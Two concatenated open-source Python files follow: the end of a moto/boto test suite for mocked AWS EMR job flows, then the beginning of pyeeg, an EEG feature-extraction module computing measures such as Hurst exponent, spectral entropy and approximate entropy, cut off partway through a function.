for idx in range(4):
cluster_name = 'cluster' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'state': 'WAITING'
}
# need sleep since it appears the timestamp is always rounded to
# the nearest second internally
time.sleep(1)
timestamp = datetime.now(pytz.utc)
time.sleep(1)
for idx in range(4, 6):
cluster_name = 'cluster' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
conn.terminate_jobflow(cluster_id)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'state': 'TERMINATED'
}
jobs = conn.describe_jobflows()
jobs.should.have.length_of(6)
for cluster_id, y in expected.items():
resp = conn.describe_jobflows(jobflow_ids=[cluster_id])
resp.should.have.length_of(1)
resp[0].jobflowid.should.equal(cluster_id)
resp = conn.describe_jobflows(states=['WAITING'])
resp.should.have.length_of(4)
for x in resp:
x.state.should.equal('WAITING')
resp = conn.describe_jobflows(created_before=timestamp)
resp.should.have.length_of(4)
resp = conn.describe_jobflows(created_after=timestamp)
resp.should.have.length_of(2)
@mock_emr_deprecated
def test_describe_jobflow():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
args.update(dict(
ami_version='3.8.1',
api_params={
#'Applications.member.1.Name': 'Spark',
#'Applications.member.1.Version': '2.4.2',
#'Configurations.member.1.Classification': 'yarn-site',
#'Configurations.member.1.Properties.entry.1.key': 'someproperty',
#'Configurations.member.1.Properties.entry.1.value': 'somevalue',
#'Instances.EmrManagedMasterSecurityGroup': 'master-security-group',
'Instances.Ec2SubnetId': 'subnet-8be41cec',
},
ec2_keyname='mykey',
hadoop_version='2.4.0',
name='My jobflow',
log_uri='s3://some_bucket/jobflow_logs',
keep_alive=True,
master_instance_type='c1.medium',
slave_instance_type='c1.medium',
num_instances=2,
availability_zone='us-west-2b',
job_flow_role='EMR_EC2_DefaultRole',
service_role='EMR_DefaultRole',
visible_to_all_users=True,
))
cluster_id = conn.run_jobflow(**args)
jf = conn.describe_jobflow(cluster_id)
jf.amiversion.should.equal(args['ami_version'])
jf.bootstrapactions.should.equal(None)
jf.creationdatetime.should.be.a(six.string_types)
jf.should.have.property('laststatechangereason')
jf.readydatetime.should.be.a(six.string_types)
jf.startdatetime.should.be.a(six.string_types)
jf.state.should.equal('WAITING')
jf.ec2keyname.should.equal(args['ec2_keyname'])
# Ec2SubnetId
jf.hadoopversion.should.equal(args['hadoop_version'])
int(jf.instancecount).should.equal(2)
for ig in jf.instancegroups:
ig.creationdatetime.should.be.a(six.string_types)
# ig.enddatetime.should.be.a(six.string_types)
ig.should.have.property('instancegroupid').being.a(six.string_types)
int(ig.instancerequestcount).should.equal(1)
ig.instancerole.should.be.within(['MASTER', 'CORE'])
int(ig.instancerunningcount).should.equal(1)
ig.instancetype.should.equal('c1.medium')
ig.laststatechangereason.should.be.a(six.string_types)
ig.market.should.equal('ON_DEMAND')
ig.name.should.be.a(six.string_types)
ig.readydatetime.should.be.a(six.string_types)
ig.startdatetime.should.be.a(six.string_types)
ig.state.should.equal('RUNNING')
jf.keepjobflowalivewhennosteps.should.equal('true')
jf.masterinstanceid.should.be.a(six.string_types)
jf.masterinstancetype.should.equal(args['master_instance_type'])
jf.masterpublicdnsname.should.be.a(six.string_types)
int(jf.normalizedinstancehours).should.equal(0)
jf.availabilityzone.should.equal(args['availability_zone'])
jf.slaveinstancetype.should.equal(args['slave_instance_type'])
jf.terminationprotected.should.equal('false')
jf.jobflowid.should.equal(cluster_id)
# jf.jobflowrole.should.equal(args['job_flow_role'])
jf.loguri.should.equal(args['log_uri'])
jf.name.should.equal(args['name'])
# jf.servicerole.should.equal(args['service_role'])
jf.steps.should.have.length_of(0)
list(i.value for i in jf.supported_products).should.equal([])
jf.visibletoallusers.should.equal('true')
@mock_emr_deprecated
def test_list_clusters():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
expected = {}
for idx in range(40):
cluster_name = 'jobflow' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'normalizedinstancehours': '0',
'state': 'WAITING'
}
# need sleep since it appears the timestamp is always rounded to
# the nearest second internally
time.sleep(1)
timestamp = datetime.now(pytz.utc)
time.sleep(1)
for idx in range(40, 70):
cluster_name = 'jobflow' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
conn.terminate_jobflow(cluster_id)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'normalizedinstancehours': '0',
'state': 'TERMINATED'
}
args = {}
while 1:
resp = conn.list_clusters(**args)
clusters = resp.clusters
len(clusters).should.be.lower_than_or_equal_to(50)
for x in clusters:
y = expected[x.id]
x.id.should.equal(y['id'])
x.name.should.equal(y['name'])
x.normalizedinstancehours.should.equal(
y['normalizedinstancehours'])
x.status.state.should.equal(y['state'])
x.status.timeline.creationdatetime.should.be.a(six.string_types)
if y['state'] == 'TERMINATED':
x.status.timeline.enddatetime.should.be.a(six.string_types)
else:
x.status.timeline.shouldnt.have.property('enddatetime')
x.status.timeline.readydatetime.should.be.a(six.string_types)
if not hasattr(resp, 'marker'):
break
args = {'marker': resp.marker}
resp = conn.list_clusters(cluster_states=['TERMINATED'])
resp.clusters.should.have.length_of(30)
for x in resp.clusters:
x.status.state.should.equal('TERMINATED')
resp = conn.list_clusters(created_before=timestamp)
resp.clusters.should.have.length_of(40)
resp = conn.list_clusters(created_after=timestamp)
resp.clusters.should.have.length_of(30)
@mock_emr_deprecated
def test_run_jobflow():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
job_id = conn.run_jobflow(**args)
job_flow = conn.describe_jobflow(job_id)
job_flow.state.should.equal('WAITING')
job_flow.jobflowid.should.equal(job_id)
job_flow.name.should.equal(args['name'])
job_flow.masterinstancetype.should.equal(args['master_instance_type'])
job_flow.slaveinstancetype.should.equal(args['slave_instance_type'])
job_flow.loguri.should.equal(args['log_uri'])
job_flow.visibletoallusers.should.equal('false')
int(job_flow.normalizedinstancehours).should.equal(0)
job_flow.steps.should.have.length_of(0)
@mock_emr_deprecated
def test_run_jobflow_in_multiple_regions():
regions = {}
for region in ['us-east-1', 'eu-west-1']:
conn = boto.emr.connect_to_region(region)
args = run_jobflow_args.copy()
args['name'] = region
cluster_id = conn.run_jobflow(**args)
regions[region] = {'conn': conn, 'cluster_id': cluster_id}
for region in regions.keys():
conn = regions[region]['conn']
jf = conn.describe_jobflow(regions[region]['cluster_id'])
jf.name.should.equal(region)
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_run_jobflow_with_new_params():
# Test that run_jobflow works with newer params
conn = boto.connect_emr()
conn.run_jobflow(**run_jobflow_args)
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_run_jobflow_with_visible_to_all_users():
conn = boto.connect_emr()
for expected in (True, False):
job_id = conn.run_jobflow(
visible_to_all_users=expected,
**run_jobflow_args
)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal(str(expected).lower())
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_run_jobflow_with_instance_groups():
input_groups = dict((g.name, g) for g in input_instance_groups)
conn = boto.connect_emr()
job_id = conn.run_jobflow(instance_groups=input_instance_groups,
**run_jobflow_args)
job_flow = conn.describe_jobflow(job_id)
int(job_flow.instancecount).should.equal(
sum(g.num_instances for g in input_instance_groups))
for instance_group in job_flow.instancegroups:
expected = input_groups[instance_group.name]
instance_group.should.have.property('instancegroupid')
int(instance_group.instancerunningcount).should.equal(
expected.num_instances)
instance_group.instancerole.should.equal(expected.role)
instance_group.instancetype.should.equal(expected.type)
instance_group.market.should.equal(expected.market)
if hasattr(expected, 'bidprice'):
instance_group.bidprice.should.equal(expected.bidprice)
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_set_termination_protection():
conn = boto.connect_emr()
job_id = conn.run_jobflow(**run_jobflow_args)
job_flow = conn.describe_jobflow(job_id)
job_flow.terminationprotected.should.equal('false')
conn.set_termination_protection(job_id, True)
job_flow = conn.describe_jobflow(job_id)
job_flow.terminationprotected.should.equal('true')
conn.set_termination_protection(job_id, False)
job_flow = conn.describe_jobflow(job_id)
job_flow.terminationprotected.should.equal('false')
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_set_visible_to_all_users():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
args['visible_to_all_users'] = False
job_id = conn.run_jobflow(**args)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal('false')
conn.set_visible_to_all_users(job_id, True)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal('true')
conn.set_visible_to_all_users(job_id, False)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal('false')
@mock_emr_deprecated
def test_terminate_jobflow():
conn = boto.connect_emr()
job_id = conn.run_jobflow(**run_jobflow_args)
flow = conn.describe_jobflows()[0]
flow.state.should.equal('WAITING')
conn.terminate_jobflow(job_id)
flow = conn.describe_jobflows()[0]
flow.state.should.equal('TERMINATED')
# testing multiple end points for each feature
@mock_emr_deprecated
def test_bootstrap_actions():
bootstrap_actions = [
BootstrapAction(
name='bs1',
path='path/to/script',
bootstrap_action_args=['arg1', 'arg2&arg3']),
BootstrapAction(
name='bs2',
path='path/to/anotherscript',
bootstrap_action_args=[])
]
conn = boto.connect_emr()
cluster_id = conn.run_jobflow(
bootstrap_actions=bootstrap_actions,
**run_jobflow_args
)
jf = conn.describe_jobflow(cluster_id)
for x, y in zip(jf.bootstrapactions, bootstrap_actions):
x.name.should.equal(y.name)
x.path.should.equal(y.path)
list(o.value for o in x.args).should.equal(y.args())
resp = conn.list_bootstrap_actions(cluster_id)
for i, y in enumerate(bootstrap_actions):
x = resp.actions[i]
x.name.should.equal(y.name)
x.scriptpath.should.equal(y.path)
list(arg.value for arg in x.args).should.equal(y.args())
@mock_emr_deprecated
def test_instance_groups():
input_groups = dict((g.name, g) for g in input_instance_groups)
conn = boto.connect_emr()
args = run_jobflow_args.copy()
for key in ['master_instance_type', 'slave_instance_type', 'num_instances']:
del args[key]
args['instance_groups'] = input_instance_groups[:2]
job_id = conn.run_jobflow(**args)
jf = conn.describe_jobflow(job_id)
base_instance_count = int(jf.instancecount)
conn.add_instance_groups(job_id, input_instance_groups[2:])
jf = conn.describe_jobflow(job_id)
int(jf.instancecount).should.equal(
sum(g.num_instances for g in input_instance_groups))
for x in jf.instancegroups:
y = input_groups[x.name]
if hasattr(y, 'bidprice'):
x.bidprice.should.equal(y.bidprice)
x.creationdatetime.should.be.a(six.string_types)
# x.enddatetime.should.be.a(six.string_types)
x.should.have.property('instancegroupid')
int(x.instancerequestcount).should.equal(y.num_instances)
x.instancerole.should.equal(y.role)
int(x.instancerunningcount).should.equal(y.num_instances)
x.instancetype.should.equal(y.type)
x.laststatechangereason.should.be.a(six.string_types)
x.market.should.equal(y.market)
x.name.should.be.a(six.string_types)
x.readydatetime.should.be.a(six.string_types)
x.startdatetime.should.be.a(six.string_types)
x.state.should.equal('RUNNING')
for x in conn.list_instance_groups(job_id).instancegroups:
y = input_groups[x.name]
if hasattr(y, 'bidprice'):
x.bidprice.should.equal(y.bidprice)
# Configurations
# EbsBlockDevices
# EbsOptimized
x.should.have.property('id')
x.instancegrouptype.should.equal(y.role)
x.instancetype.should.equal(y.type)
x.market.should.equal(y.market)
x.name.should.equal(y.name)
int(x.requestedinstancecount).should.equal(y.num_instances)
int(x.runninginstancecount).should.equal(y.num_instances)
# ShrinkPolicy
x.status.state.should.equal('RUNNING')
x.status.statechangereason.code.should.be.a(six.string_types)
x.status.statechangereason.message.should.be.a(six.string_types)
x.status.timeline.creationdatetime.should.be.a(six.string_types)
# x.status.timeline.enddatetime.should.be.a(six.string_types)
x.status.timeline.readydatetime.should.be.a(six.string_types)
igs = dict((g.name, g) for g in jf.instancegroups)
conn.modify_instance_groups(
[igs['task-1'].instancegroupid, igs['task-2'].instancegroupid],
[2, 3])
jf = conn.describe_jobflow(job_id)
int(jf.instancecount).should.equal(base_instance_count + 5)
igs = dict((g.name, g) for g in jf.instancegroups)
int(igs['task-1'].instancerunningcount).should.equal(2)
int(igs['task-2'].instancerunningcount).should.equal(3)
@mock_emr_deprecated
def test_steps():
input_steps = [
StreamingStep(
name='My wordcount example',
mapper='s3n://elasticmapreduce/samples/wordcount/wordSplitter.py',
reducer='aggregate',
input='s3n://elasticmapreduce/samples/wordcount/input',
output='s3n://output_bucket/output/wordcount_output'),
StreamingStep(
name='My wordcount example & co.',
mapper='s3n://elasticmapreduce/samples/wordcount/wordSplitter2.py',
reducer='aggregate',
input='s3n://elasticmapreduce/samples/wordcount/input2',
output='s3n://output_bucket/output/wordcount_output2')
]
# TODO: implementation and test for cancel_steps
conn = boto.connect_emr()
cluster_id = conn.run_jobflow(
steps=[input_steps[0]],
**run_jobflow_args)
jf = conn.describe_jobflow(cluster_id)
jf.steps.should.have.length_of(1)
conn.add_jobflow_steps(cluster_id, [input_steps[1]])
jf = conn.describe_jobflow(cluster_id)
jf.steps.should.have.length_of(2)
for step in jf.steps:
step.actiononfailure.should.equal('TERMINATE_JOB_FLOW')
list(arg.value for arg in step.args).should.have.length_of(8)
step.creationdatetime.should.be.a(six.string_types)
# step.enddatetime.should.be.a(six.string_types)
step.jar.should.equal(
'/home/hadoop/contrib/streaming/hadoop-streaming.jar')
step.laststatechangereason.should.be.a(six.string_types)
step.mainclass.should.equal('')
step.name.should.be.a(six.string_types)
# step.readydatetime.should.be.a(six.string_types)
# step.startdatetime.should.be.a(six.string_types)
step.state.should.be.within(['STARTING', 'PENDING'])
expected = dict((s.name, s) for s in input_steps)
steps = conn.list_steps(cluster_id).steps
for x in steps:
y = expected[x.name]
# actiononfailure
list(arg.value for arg in x.config.args).should.equal([
'-mapper', y.mapper,
'-reducer', y.reducer,
'-input', y.input,
'-output', y.output,
])
x.config.jar.should.equal(
'/home/hadoop/contrib/streaming/hadoop-streaming.jar')
x.config.mainclass.should.equal('')
# properties
x.should.have.property('id').should.be.a(six.string_types)
x.name.should.equal(y.name)
x.status.state.should.be.within(['STARTING', 'PENDING'])
# x.status.statechangereason
x.status.timeline.creationdatetime.should.be.a(six.string_types)
# x.status.timeline.enddatetime.should.be.a(six.string_types)
# x.status.timeline.startdatetime.should.be.a(six.string_types)
x = conn.describe_step(cluster_id, x.id)
list(arg.value for arg in x.config.args).should.equal([
'-mapper', y.mapper,
'-reducer', y.reducer,
'-input', y.input,
'-output', y.output,
])
x.config.jar.should.equal(
'/home/hadoop/contrib/streaming/hadoop-streaming.jar')
x.config.mainclass.should.equal('')
# properties
x.should.have.property('id').should.be.a(six.string_types)
x.name.should.equal(y.name)
x.status.state.should.be.within(['STARTING', 'PENDING'])
# x.status.statechangereason
x.status.timeline.creationdatetime.should.be.a(six.string_types)
# x.status.timeline.enddatetime.should.be.a(six.string_types)
# x.status.timeline.startdatetime.should.be.a(six.string_types)
@requires_boto_gte('2.39')
def test_list_steps_with_states():
# boto's list_steps prior to 2.39 has a bug that ignores
# step_states argument.
steps = conn.list_steps(cluster_id).steps
step_id = steps[0].id
steps = conn.list_steps(cluster_id, step_states=['STARTING']).steps
steps.should.have.length_of(1)
steps[0].id.should.equal(step_id)
test_list_steps_with_states()
@mock_emr_deprecated
def test_tags():
input_tags = {"tag1": "val1", "tag2": "val2"}
conn = boto.connect_emr()
cluster_id = conn.run_jobflow(**run_jobflow_args)
conn.add_tags(cluster_id, input_tags)
cluster = conn.describe_cluster(cluster_id)
cluster.tags.should.have.length_of(2)
dict((t.key, t.value) for t in cluster.tags).should.equal(input_tags)
conn.remove_tags(cluster_id, list(input_tags.keys()))
cluster = conn.describe_cluster(cluster_id)
cluster.tags.should.have.length_of(0)
| apache-2.0 | -2,149,370,948,167,681,300 | 35.855623 | 82 | 0.652757 | false |
ftuyama/TEEG | mindwave/pyeeg.py | 2 | 23008 | """Copyleft 2010 Forrest Sheng Bao http://fsbao.net
PyEEG, a Python module to extract EEG features, v 0.02_r2
Project homepage: http://pyeeg.org
**Data structure**
PyEEG only uses standard Python and numpy data structures,
so you need to import numpy before using it.
For numpy, please visit http://numpy.scipy.org
**Naming convention**
I follow "Style Guide for Python Code" to code my program
http://www.python.org/dev/peps/pep-0008/
Constants: UPPER_CASE_WITH_UNDERSCORES, e.g., SAMPLING_RATE, LENGTH_SIGNAL.
Function names: lower_case_with_underscores, e.g., spectrum_entropy.
Variables (global and local): CapitalizedWords or CapWords, e.g., Power.
If a variable name consists of one letter, I may use lower case, e.g., x, y.
Functions listed alphabetically
--------------------------------------------------
"""
from numpy.fft import fft
from numpy import zeros, floor, log10, log, mean, array, sqrt, vstack, cumsum, \
ones, log2, std
from numpy.linalg import svd, lstsq
import time
######################## Functions contributed by Xin Liu #################
def hurst(X):
""" Compute the Hurst exponent of X. If the output H=0.5,the behavior
of the time-series is similar to random walk. If H<0.5, the time-series
cover less "distance" than a random walk, vice verse.
Parameters
----------
X
list
a time series
Returns
-------
H
float
Hurst exponent
Examples
--------
>>> import pyeeg
>>> from numpy.random import randn
>>> a = randn(4096)
>>> pyeeg.hurst(a)
>>> 0.5057444
"""
N = len(X)
T = array([float(i) for i in xrange(1,N+1)])
Y = cumsum(X)
Ave_T = Y/T
S_T = zeros((N))
R_T = zeros((N))
for i in xrange(N):
S_T[i] = std(X[:i+1])
X_T = Y - T * Ave_T[i]
R_T[i] = max(X_T[:i + 1]) - min(X_T[:i + 1])
R_S = R_T / S_T
R_S = log(R_S)
n = log(T).reshape(N, 1)
H = lstsq(n[1:], R_S[1:])[0]
return H[0]
######################## Begin function definitions #######################
def embed_seq(X,Tau,D):
"""Build a set of embedding sequences from given time series X with lag Tau
and embedding dimension DE. Let X = [x(1), x(2), ... , x(N)], then for each
i such that 1 < i < N - (D - 1) * Tau, we build an embedding sequence,
Y(i) = [x(i), x(i + Tau), ... , x(i + (D - 1) * Tau)]. All embedding
sequence are placed in a matrix Y.
Parameters
----------
X
list
a time series
Tau
integer
the lag or delay when building embedding sequence
D
integer
the embedding dimension
Returns
-------
Y
2-D list
embedding matrix built
Examples
---------------
>>> import pyeeg
>>> a=range(0,9)
>>> pyeeg.embed_seq(a,1,4)
array([[ 0., 1., 2., 3.],
[ 1., 2., 3., 4.],
[ 2., 3., 4., 5.],
[ 3., 4., 5., 6.],
[ 4., 5., 6., 7.],
[ 5., 6., 7., 8.]])
>>> pyeeg.embed_seq(a,2,3)
array([[ 0., 2., 4.],
[ 1., 3., 5.],
[ 2., 4., 6.],
[ 3., 5., 7.],
[ 4., 6., 8.]])
>>> pyeeg.embed_seq(a,4,1)
array([[ 0.],
[ 1.],
[ 2.],
[ 3.],
[ 4.],
[ 5.],
[ 6.],
[ 7.],
[ 8.]])
"""
N =len(X)
if D * Tau > N:
print "Cannot build such a matrix, because D * Tau > N"
exit()
if Tau<1:
print "Tau has to be at least 1"
exit()
Y=zeros((N - (D - 1) * Tau, D))
for i in xrange(0, N - (D - 1) * Tau):
for j in xrange(0, D):
Y[i][j] = X[i + j * Tau]
return Y
def in_range(Template, Scroll, Distance):
"""Determines whether one vector is the the range of another vector.
The two vectors should have equal length.
Parameters
-----------------
Template
list
The template vector, one of two vectors being compared
Scroll
list
The scroll vector, one of the two vectors being compared
D
float
Two vectors match if their distance is less than D
Bit
Notes
-------
The distance between two vectors can be defined as Euclidean distance
according to some publications.
The two vector should of equal length
"""
for i in range(0, len(Template)):
if abs(Template[i] - Scroll[i]) > Distance:
return False
return True
""" Desperate code, but do not delete
def bit_in_range(Index):
if abs(Scroll[Index] - Template[Bit]) <= Distance :
print "Bit=", Bit, "Scroll[Index]", Scroll[Index], "Template[Bit]",\
Template[Bit], "abs(Scroll[Index] - Template[Bit])",\
abs(Scroll[Index] - Template[Bit])
return Index + 1 # move
Match_No_Tail = range(0, len(Scroll) - 1) # except the last one
# print Match_No_Tail
# first compare Template[:-2] and Scroll[:-2]
for Bit in xrange(0, len(Template) - 1): # every bit of Template is in range of Scroll
Match_No_Tail = filter(bit_in_range, Match_No_Tail)
print Match_No_Tail
# second and last, check whether Template[-1] is in range of Scroll and
# Scroll[-1] in range of Template
# 2.1 Check whether Template[-1] is in the range of Scroll
Bit = - 1
Match_All = filter(bit_in_range, Match_No_Tail)
# 2.2 Check whether Scroll[-1] is in the range of Template
# I just write a loop for this.
for i in Match_All:
if abs(Scroll[-1] - Template[i] ) <= Distance:
Match_All.remove(i)
return len(Match_All), len(Match_No_Tail)
"""
def bin_power(X,Band,Fs):
"""Compute power in each frequency bin specified by Band from FFT result of
X. By default, X is a real signal.
Note
-----
A real signal can be synthesized, thus not real.
Parameters
-----------
Band
list
boundary frequencies (in Hz) of bins. They can be unequal bins, e.g.
[0.5,4,7,12,30] which are delta, theta, alpha and beta respectively.
You can also use range() function of Python to generate equal bins and
pass the generated list to this function.
Each element of Band is a physical frequency and shall not exceed the
Nyquist frequency, i.e., half of sampling frequency.
X
list
a 1-D real time series.
Fs
integer
the sampling rate in physical frequency
Returns
-------
Power
list
spectral power in each frequency bin.
Power_ratio
list
spectral power in each frequency bin normalized by total power in ALL
frequency bins.
"""
C = fft(X)
C = abs(C)
Power =zeros(len(Band)-1);
for Freq_Index in xrange(0,len(Band)-1):
Freq = float(Band[Freq_Index]) ## Xin Liu
Next_Freq = float(Band[Freq_Index+1])
Power[Freq_Index] = sum(C[int(floor(Freq/Fs*len(X))):int(floor(Next_Freq/Fs*len(X)))])
Power_Ratio = Power/sum(Power)
return Power, Power_Ratio
def first_order_diff(X):
""" Compute the first order difference of a time series.
For a time series X = [x(1), x(2), ... , x(N)], its first order
difference is:
Y = [x(2) - x(1) , x(3) - x(2), ..., x(N) - x(N-1)]
"""
D=[]
for i in xrange(1,len(X)):
D.append(X[i]-X[i-1])
return D
def pfd(X, D=None):
"""Compute Petrosian Fractal Dimension of a time series from either two
cases below:
1. X, the time series of type list (default)
2. D, the first order differential sequence of X (if D is provided,
recommended to speed up)
In case 1, D is computed by first_order_diff(X) function of pyeeg
To speed up, it is recommended to compute D before calling this function
because D may also be used by other functions whereas computing it here
again will slow down.
"""
if D is None: ## Xin Liu
D = first_order_diff(X)
N_delta= 0; #number of sign changes in derivative of the signal
for i in xrange(1,len(D)):
if D[i]*D[i-1]<0:
N_delta += 1
n = len(X)
return log10(n)/(log10(n)+log10(n/n+0.4*N_delta))
def hfd(X, Kmax):
""" Compute Hjorth Fractal Dimension of a time series X, kmax
is an HFD parameter
"""
L = [];
x = []
N = len(X)
for k in xrange(1,Kmax):
Lk = []
for m in xrange(0,k):
Lmk = 0
for i in xrange(1,int(floor((N-m)/k))):
Lmk += abs(X[m+i*k] - X[m+i*k-k])
Lmk = Lmk*(N - 1)/floor((N - m) / float(k)) / k
Lk.append(Lmk)
L.append(log(mean(Lk)))
x.append([log(float(1) / k), 1])
(p, r1, r2, s)=lstsq(x, L)
return p[0]
def hjorth(X, D = None):
""" Compute Hjorth mobility and complexity of a time series from either two
cases below:
1. X, the time series of type list (default)
2. D, a first order differential sequence of X (if D is provided,
recommended to speed up)
In case 1, D is computed by first_order_diff(X) function of pyeeg
Notes
-----
To speed up, it is recommended to compute D before calling this function
because D may also be used by other functions whereas computing it here
again will slow down.
Parameters
----------
X
list
a time series
D
list
first order differential sequence of a time series
Returns
-------
As indicated in return line
Hjorth mobility and complexity
"""
if D is None:
D = first_order_diff(X)
D.insert(0, X[0]) # pad the first difference
D = array(D)
n = len(X)
M2 = float(sum(D ** 2)) / n
TP = sum(array(X) ** 2)
M4 = 0;
for i in xrange(1, len(D)):
M4 += (D[i] - D[i - 1]) ** 2
M4 = M4 / n
return sqrt(M2 / TP), sqrt(float(M4) * TP / M2 / M2) # Hjorth Mobility and Complexity
def spectral_entropy(X, Band, Fs, Power_Ratio = None):
"""Compute spectral entropy of a time series from either two cases below:
1. X, the time series (default)
2. Power_Ratio, a list of normalized signal power in a set of frequency
bins defined in Band (if Power_Ratio is provided, recommended to speed up)
In case 1, Power_Ratio is computed by bin_power() function.
Notes
-----
To speed up, it is recommended to compute Power_Ratio before calling this
function because it may also be used by other functions whereas computing
it here again will slow down.
Parameters
----------
Band
list
boundary frequencies (in Hz) of bins. They can be unequal bins, e.g.
[0.5,4,7,12,30] which are delta, theta, alpha and beta respectively.
You can also use range() function of Python to generate equal bins and
pass the generated list to this function.
Each element of Band is a physical frequency and shall not exceed the
Nyquist frequency, i.e., half of sampling frequency.
X
list
a 1-D real time series.
Fs
integer
the sampling rate in physical frequency
Returns
-------
As indicated in return line
See Also
--------
bin_power: pyeeg function that computes spectral power in frequency bins
"""
if Power_Ratio is None:
Power, Power_Ratio = bin_power(X, Band, Fs)
Spectral_Entropy = 0
for i in xrange(0, len(Power_Ratio) - 1):
Spectral_Entropy += Power_Ratio[i] * log(Power_Ratio[i])
Spectral_Entropy /= log(len(Power_Ratio)) # to save time, minus one is omitted
return -1 * Spectral_Entropy
def svd_entropy(X, Tau, DE, W = None):
"""Compute SVD Entropy from either two cases below:
1. a time series X, with lag tau and embedding dimension dE (default)
2. a list, W, of normalized singular values of a matrix (if W is provided,
recommend to speed up.)
If W is None, the function will do as follows to prepare singular spectrum:
First, computer an embedding matrix from X, Tau and DE using pyeeg
function embed_seq():
M = embed_seq(X, Tau, DE)
Second, use scipy.linalg function svd to decompose the embedding matrix
M and obtain a list of singular values:
W = svd(M, compute_uv=0)
At last, normalize W:
W /= sum(W)
Notes
-------------
To speed up, it is recommended to compute W before calling this function
because W may also be used by other functions whereas computing it here
again will slow down.
"""
if W is None:
Y = EmbedSeq(X, tau, dE)
W = svd(Y, compute_uv = 0)
W /= sum(W) # normalize singular values
return -1*sum(W * log(W))
def fisher_info(X, Tau, DE, W = None):
""" Compute Fisher information of a time series from either two cases below:
1. X, a time series, with lag Tau and embedding dimension DE (default)
2. W, a list of normalized singular values, i.e., singular spectrum (if W is
provided, recommended to speed up.)
If W is None, the function will do as follows to prepare singular spectrum:
First, computer an embedding matrix from X, Tau and DE using pyeeg
function embed_seq():
M = embed_seq(X, Tau, DE)
Second, use scipy.linalg function svd to decompose the embedding matrix
M and obtain a list of singular values:
W = svd(M, compute_uv=0)
At last, normalize W:
W /= sum(W)
Parameters
----------
X
list
a time series. X will be used to build embedding matrix and compute
singular values if W or M is not provided.
Tau
integer
the lag or delay when building a embedding sequence. Tau will be used
to build embedding matrix and compute singular values if W or M is not
provided.
DE
integer
the embedding dimension to build an embedding matrix from a given
series. DE will be used to build embedding matrix and compute
singular values if W or M is not provided.
W
list or array
the set of singular values, i.e., the singular spectrum
Returns
-------
FI
integer
Fisher information
Notes
-----
To speed up, it is recommended to compute W before calling this function
because W may also be used by other functions whereas computing it here
again will slow down.
See Also
--------
embed_seq : embed a time series into a matrix
"""
if W is None:
M = embed_seq(X, Tau, DE)
W = svd(M, compute_uv = 0)
W /= sum(W)
FI = 0
for i in xrange(0, len(W) - 1): # from 1 to M
FI += ((W[i +1] - W[i]) ** 2) / (W[i])
return FI
def ap_entropy(X, M, R):
"""Computer approximate entropy (ApEN) of series X, specified by M and R.
Suppose given time series is X = [x(1), x(2), ... , x(N)]. We first build
embedding matrix Em, of dimension (N-M+1)-by-M, such that the i-th row of Em
is x(i),x(i+1), ... , x(i+M-1). Hence, the embedding lag and dimension are
1 and M-1 respectively. Such a matrix can be built by calling pyeeg function
as Em = embed_seq(X, 1, M). Then we build matrix Emp, whose only
difference with Em is that the length of each embedding sequence is M + 1
Denote the i-th and j-th row of Em as Em[i] and Em[j]. Their k-th elments
are Em[i][k] and Em[j][k] respectively. The distance between Em[i] and Em[j]
is defined as 1) the maximum difference of their corresponding scalar
components, thus, max(Em[i]-Em[j]), or 2) Euclidean distance. We say two 1-D
vectors Em[i] and Em[j] *match* in *tolerance* R, if the distance between them
is no greater than R, thus, max(Em[i]-Em[j]) <= R. Mostly, the value of R is
defined as 20% - 30% of standard deviation of X.
Pick Em[i] as a template, for all j such that 0 < j < N - M + 1, we can
check whether Em[j] matches with Em[i]. Denote the number of Em[j],
which is in the range of Em[i], as k[i], which is the i-th element of the
vector k. The probability that a random row in Em matches Em[i] is
\simga_1^{N-M+1} k[i] / (N - M + 1), thus sum(k)/ (N - M + 1),
denoted as Cm[i].
We repeat the same process on Emp and obtained Cmp[i], but here 0<i<N-M
since the length of each sequence in Emp is M + 1.
The probability that any two embedding sequences in Em match is then
sum(Cm)/ (N - M +1 ). We define Phi_m = sum(log(Cm)) / (N - M + 1) and
Phi_mp = sum(log(Cmp)) / (N - M ).
And the ApEn is defined as Phi_m - Phi_mp.
Notes
-----
#. Please be aware that self-match is also counted in ApEn.
#. This function now runs very slow. We are still trying to speed it up.
References
----------
Costa M, Goldberger AL, Peng CK, Multiscale entropy analysis of biolgical
signals, Physical Review E, 71:021906, 2005
See also
--------
samp_entropy: sample entropy of a time series
Notes
-----
Extremely slow implementation. Do NOT use if your dataset is not small.
"""
N = len(X)
Em = embed_seq(X, 1, M)
Emp = embed_seq(X, 1, M + 1) # try to only build Emp to save time
Cm, Cmp = zeros(N - M + 1), zeros(N - M)
# in case there is 0 after counting. Log(0) is undefined.
for i in xrange(0, N - M):
# print i
for j in xrange(i, N - M): # start from i, self-match counts in ApEn
# if max(abs(Em[i]-Em[j])) <= R:# compare N-M scalars in each subseq v 0.01b_r1
if in_range(Em[i], Em[j], R):
Cm[i] += 1 ### Xin Liu
Cm[j] += 1
if abs(Emp[i][-1] - Emp[j][-1]) <= R: # check last one
Cmp[i] += 1
Cmp[j] += 1
if in_range(Em[i], Em[N-M], R):
Cm[i] += 1
Cm[N-M] += 1
# try to count Cm[j] and Cmp[j] as well here
